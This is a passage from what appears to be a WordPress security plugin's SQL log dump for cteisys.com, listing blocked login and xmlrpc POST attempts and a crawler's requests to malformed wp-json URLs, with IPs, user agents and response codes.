(KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','9zsKpM4da65gAmniLjfODqEJ',0,1664837089.6289,1279,'','POST',403,0,600,0,1,'',0),('161.35.52.207',2703439055,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','NIbvC6x80HhjDGQBeAqy7X4T',0,1664837113.8742,505,'','POST',403,0,600,0,1,'',0),('8.142.173.121',143568249,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','XstCR2ngDqaOGrVj4IPQHMux',0,1664837897.8473,17191,'','POST',403,0,600,0,1,'',0),('185.2.4.134',3103917190,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','dCqG4jQfUJOoLB9evlkuzDA2',0,1664837921.6437,463,'','POST',403,0,600,0,1,'',0),('107.189.14.89',1807552089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','lwJ6FPytBqAfYj5d2gnEb0ZK',0,1664838569.6402,497,'','POST',403,0,600,0,1,'',0),('34.68.76.32',574901280,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','EaMJ3qxTFmcfB0t5Lwb7HsuD',0,1664838709.9667,18719,'','POST',403,0,600,0,1,'',0),('80.190.117.244',1354659316,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','aJKwxn1QVoq9G8gcPUkCBLYd',0,1664838733.7265,483,'','POST',403,0,600,0,1,'',0),('217.21.85.126',3642054014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','37ZXLcq0U1Jxdz6uP4iMBrWI',0,1664839069.9847,4246,'','POST',403,0,515,0,1,'',0),('47.94.219.115',794745715,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','jSuHrRi5sVla2LUegEdfT1P7',0,1664839066.4198,7860,'','POST',403,0,515,0,1,'',0),('138.219.230.121',2329667193,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','pdX0rJQ5zNlwhaeq4g7WKC1A',0,1664839070.4047,4025,'','POST',403,0,515,0,1,'',0),('217.21.74.40',3642051112,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','GvcoILzCQxRNUiBWPd1rHFS9',0,1664839078.2304,465,'','POST',403,0,515,0,1,'',0),('45.119.82.214',762794710,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','nF7uTkJ29HwXaPcLpIGdAyji',0,1664839078.9722,1185,'','POST',403,0,515,0,1,'',0),('194.27.156.245',3256589557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','aw89vdc5Wpy62ADkJPXUxE7m',0,1664839084.7874,527,'','POST',403,0,515,0,1,'',0),('217.21.85.126',3642054014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Mr2UaCGB6LQJnh0zpXueYx8V',0,1664839089.7863,485,'','POST',403,0,515,0,1,'',0),('104.251.216.88',1761335384,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','HgOhUBwi3NLWseQSdJvAV5FE',0,1664839091.8057,484,'','POST',403,0,515,0,1,'',0),('134.122.42.249',2256153337,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','49rUV6Km01GXelCTaufIdcBj',0,1664839100.9735,625,'','POST',403,0,515,0,1,'',0),('185.232.14.51',3118992947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','3uTl1Pw4mBtGZvMgXN9bDEIq',0,1664839101.6878,475,'','POST',403,0,515,0,1,'',0),('27.72.145.33',457740577,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','rktdnJWuGYQajyw2m1SfDMgB',0,1664839527.0033,17879,'','POST',403,0,600,0,1,'',0),('54.38.73.235',908478955,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','rX9kCObgMNveD1dTqIFya3Jn',0,1664839550.5363,509,'','POST',403,0,600,0,1,'',0),('80.88.88.149',1347967125,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','mUIlhbYvWPRJaysxNGKB9Cgu',0,1664840340.9688,1601,'','POST',403,0,600,0,1,'',0),('212.110.92.155',3564002459,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','LrfIVpP0H7UE6htvdnTiYgBK',0,1664840367.1280,588,'','POST',403,0,600,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/repairs%5C/%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','RF3s5f9lea0TZt7pivywhnCj',0,1664840544.3527,541,'','GET',404,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/insurance%5C/%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','1WVZKb5LGnJFl6SOTMIyRkYm',0,1664840545.9299,407,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/insurance%5C/%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','02cuJIvnfG7YTOX38aNSwPhy',0,1664840547.0172,436,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2022%5C/08%5C/repair1.jpg%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','AvGlTCYySDx6Va03jnbzfo2Q',0,1664840548.3170,404,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2022%5C/08%5C/repair1.jpg%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','6yIqH4omWQn1bBKu3FdgCNiG',0,1664840549.4115,371,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img1.jpg%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','ngNWth5yUrvKxwYPM3iuZka2',0,1664840550.1537,397,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img1.jpg%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','c2jbPfHRA0zVBYK1diGNse5E',0,1664840551.6320,390,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','mZcGkNzDSqn3R51v9Ub0twK7',0,1664840552.6557,385,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','vEnSP5zdeoculWDKRmtMX8Hk',0,1664840554.3544,414,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/gutters%5C/%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','bwUft2jcrKy19vTMedNZEgSO',0,1664840555.2258,425,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/gutters%5C/%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','t9xL4Svn3olEbJ7jcdiGDqO1',0,1664840556.1928,370,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/email-icon.png%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','veE6O8gGQImZTklMX9CSzJAU',0,1664840560.0515,423,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/email-icon.png%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','0zIJY4Gu2iPblZHUyX85CKsA',0,1664840560.9241,361,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/dunriteroof.com%5C/gallery%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','41Psz8AE5gicdlyHWxjLTXeM',0,1664840561.6597,390,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/dunriteroof.com%5C/gallery%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','8mynbLtJp5D209HxqlG4IAUY',0,1664840562.5163,390,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/slider3-1024x597.jpg%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','u4rZNe6K7aDS2nQ5EkTgRCm9',0,1664840563.3035,422,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/slider3-1024x597.jpg%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','xTZEOH9P0QMFDzV2v6GCo5Kk',0,1664840564.4704,375,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/dunriteroof.com%5C/contact','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','c9jJ5VMskWgOlSBxU7D0TdG4',0,1664840565.2720,449,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/dunriteroof.com%5C/contact','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','8C2Vxk3KYEbTrjlDIyuPpcmX',0,1664840566.4446,473,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/services%5C/tiling%5C/%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','qfc9bihvCFnjGYPkza5xHLET',0,1664840568.5387,446,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/services%5C/tiling%5C/%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','oAwLpVuyz8eFJ7rHCKtb5mY9',0,1664840569.9429,397,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcteisys.com%2Fservices%2Frepairs%2F','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','j2HW30iLK8yI71mqXAzxu4QD',0,1664840570.7309,339,'','GET',403,0,700,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcteisys.com%2Fservices%2Frepairs%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','MT4ocdba9mzSsfEqt7uy1Oph',0,1664840571.5309,305,'','GET',403,0,700,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/roofing.jpg%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','hG3IBxsourSEnbZJzUagkpcA',0,1664840572.3085,368,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/roofing.jpg%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','6Dt0R4JN7WqTKz5QE9rM3ily',0,1664840573.2370,472,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img3.jpg%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','GmAukWVn7FpBO6M1yJrqaf4H',0,1664840574.6917,405,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img3.jpg%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','pFeD8VJXC6ElmkYguxorsIMQ',0,1664840576.0847,419,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','kOlTXx3VajUfiCQmy50L1szF',0,1664840576.8930,433,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','iAVmzWIrXKwJRu1G8etDSHCf',0,1664840578.4887,485,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2022%5C/08%5C/Capture.jpg%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','VMr6kX4HusBzwQb1dCDRLOoE',0,1664840579.5784,458,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2022%5C/08%5C/Capture.jpg%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','4kzRQME7xWXLoucy3wgaHpUS',0,1664840581.0746,554,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/roofing%5C/%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','JfL3MPsH2ze8w5QXytxZUDlv',0,1664840595.0943,679,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/roofing%5C/%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','bHxPlRACBhXmMtsy3QLnjDVY',0,1664840597.0929,2474,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/oembed/1.0/%5C/%5C/cteisys.com%5C/services%5C/insurance%5C/embed%5C/','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','8Sef24wZxkEyoGF9TBv71qsC',0,1664840600.2573,455,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/oembed/1.0/%5C/%5C/cteisys.com%5C/services%5C/insurance%5C/embed%5C/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','nIU9cGs2u3XQJHf7FRyoLN6d',0,1664840601.8947,438,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/services%5C/roofing%5C/%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','XkJ9rAn4Dmi2KhotEQbWPz6s',0,1664840603.9312,487,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/services%5C/roofing%5C/%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','RVweJubrpA5q0ly3W8n1dhQL',0,1664840604.9597,455,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/services-img3.jpg%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','AZyX7DucgJPzNvVYlki5Idaw',0,1664840606.6787,392,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/services-img3.jpg%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','1NovYxfjc4VkLByERZU0hbQl',0,1664840607.6458,500,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcteisys.com%2Fservices%2Frepairs%2F&format=xml','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','C5ZmnM1qvjw7Gfc2hz3QsTJN',0,1664840608.8865,293,'','GET',403,0,700,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcteisys.com%2Fservices%2Frepairs%2F&format=xml','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','jDGa2cqlyb5Vpo0Qsm9wUtCR',0,1664840609.7527,325,'','GET',403,0,700,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcteisys.com%2Fservices%2Fgutters%2F','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','vjpaE3GB7cD8xRZ5tbHysX9Y',0,1664840610.5086,282,'','GET',403,0,700,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcteisys.com%2Fservices%2Fgutters%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','04F5hD3m71nUOMElPeWIzxVk',0,1664840611.5223,311,'','GET',403,0,700,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcteisys.com%2Fservices%2Fgutters%2F&format=xml','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','klEs495UyjxA7JBudZ23WCqp',0,1664840612.4803,293,'','GET',403,0,700,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcteisys.com%2Fservices%2Fgutters%2F&format=xml','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','dJXlsWpD7NbwxZLE3inFhy6f',0,1664840613.6911,350,'','GET',403,0,700,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/team-member1-150x150.jpg%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','ViO0BIb6e4c8u13dEpqg2FYz',0,1664840614.8317,385,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/team-member1-150x150.jpg%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','8Id3e59NzBgTLU6mO02DPXKn',0,1664840616.1443,380,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img2.png%5C%22','','{\"1\":\"LightspeedSystemsCrawler Mozilla\\/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\"2\":\"https:\\/\\/cteisys.com\"}','8QIFYv2lm05B7JeKUyGxOHqS',0,1664840617.0209,427,'','GET',403,0,520,0,1,'',0),('207.200.8.180',3485993140,'','https://cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img2.png%5C%22','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','ATNSiEluqptxWbcgy6Vzw0H7',0,1664840618.6412,393,'','GET',403,0,520,0,1,'',0),('14.225.255.250',249692154,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 